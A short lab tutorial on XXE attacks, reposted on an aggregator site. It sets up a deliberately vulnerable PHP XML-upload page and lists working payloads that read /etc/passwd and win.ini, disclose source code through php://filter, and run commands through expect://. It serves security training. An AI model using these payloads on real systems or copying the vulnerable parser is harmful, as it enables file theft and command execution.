Lab - XML eXternal Entity Attack

发布时间：2020-12-16 09:02:55 所属栏目：百科来源：网络整理

导读：Prepare Lab Linux kali 3.14 -kali1 - 686 -pae Requments # apt-get install libapache2-mod-php5 php-xml-dtd php-xml-parser libexpect-php5 Demo Code html body h1 Process XML / h1 form action = "" method = "post" enctype = "multipart/form-data

Prepare

Lab

Linux kali 3.14-kali1-686-pae

Requments

# apt-get install libapache2-mod-php5 php-xml-dtd php-xml-parser libexpect-php5

Demo Code

<html>                       
<body>                       
<h1>Process XML</h1>         

<form action="" method="post" enctype="multipart/form-data">
    <label for="file">Archive XML:</label>        
    <input type="file" name="file" id="file">
    <input type="submit" name="submit" value="submit"><br />
</form>                      
<hr>                           
<h1>Results</h1>             
<?php # error_reporting(E_ALL);  # ini_set("display_errors",1);  if ( isset($_FILES["file"]) ) { $doc = new DOMDocument(); $doc->validateOnParse = true; $doc->Load($_FILES["file"]["tmp_name"]); $tags = $doc->getElementsByTagName("data"); foreach($tags as $tag) { echo "<pre>" . $tag->nodeValue . "</pre>n"; } } else { echo "invalid xml format"; } ?>                           

</body>                      
</html>

Exploit

Windows

File Inclusion

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml[<!ENTITY message SYSTEM "file:///C:/Windows/win.ini">]>
<xxx>&message;</xxx>

Source Disclosure

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml[<!ENTITY message SYSTEM "php://filter/read=convert.base64-encode/resource=C:/xampp/htdocs/recv.php">]>
<xxx>&message;</xxx>

Linux

File Inclusion

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "file:///etc/passwd">]>
<somexml><message>&hello;</message></somexml>

Source Disclosure

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/xxe.php">]>
<somexml><message>&hello;</message></somexml>

Command Execution

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "expect://dir">]>
<somexml><message>&hello;</message></somexml>

References

https://pentesterlab.com/exercises/play_xxe
http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html
http://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html
http://stackoverflow.com/questions/24117700/clarifications-on-xxe-vulnerabilities-throughout-php-versions

（编辑：李大同）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!